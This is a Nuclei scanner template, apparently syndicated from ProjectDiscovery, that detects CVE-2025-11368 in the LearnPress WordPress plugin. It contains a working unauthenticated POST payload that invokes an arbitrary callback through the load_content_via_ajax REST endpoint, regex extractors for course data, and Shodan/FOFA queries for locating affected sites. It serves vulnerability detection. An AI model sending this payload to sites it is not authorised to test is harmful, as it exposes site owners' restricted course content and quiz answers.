LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure

23 Jun 2026 05:08:33 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

LearnPress up to and including 4.2.9.4 exposes admin content to unauthenticated users via the REST endpoint load_content_via_ajax.

id: CVE-2025-11368

info:
  name: LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs.
  impact: |
    Unauthenticated attackers can access sensitive admin curriculum, quiz answers, and course materials, compromising educational content confidentiality.
  remediation: Update to the latest version beyond 4.2.9.4.
  reference:
    - https://wpscan.com/vulnerability/5c40d803-87b3-437b-b514-1e85b43371a0/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-11368
    epss-score: 0.00914
    epss-percentile: 0.55405
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-scan,wp-plugin,wp-scan,learnpress,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-json/lp/v1/load_content_via_ajax"

    headers:
      Content-Type: application/json

    body: '{"callback":{"class":"LearnPress\\TemplateHooks\\Course\\ListCoursesTemplate","method":"render_courses"},"args":{}}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":"success"'

      - type: word
        part: body
        words:
          - 'course-item'
          - 'course-title'
          - 'course-permalink'
          - 'learn-press-courses'
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: course_title
        part: body
        regex:
          - "course-title['\"]>([^<]+)<"
        group: 1

      - type: regex
        name: course_count
        part: body
        regex:
          - 'course-count-lesson[^>]*>([^<]+)<'
        group: 1
# digest: 4a0a00473045022071170303ddc775ba624d05b8525853634bf1b706fd389547bc25f01dfcfeb6ae022100d188432436d61c8ef6d1658195e9783eb334b443de8fd5411eb0a6cbd3cee61f:922c64590222798bb761d5b6d8e72950

07 Feb 2026 20:59 (current): Vulners AI Score 6.1 (Medium risk), CVSS 3.1 score 5.3, EPSS 0.00914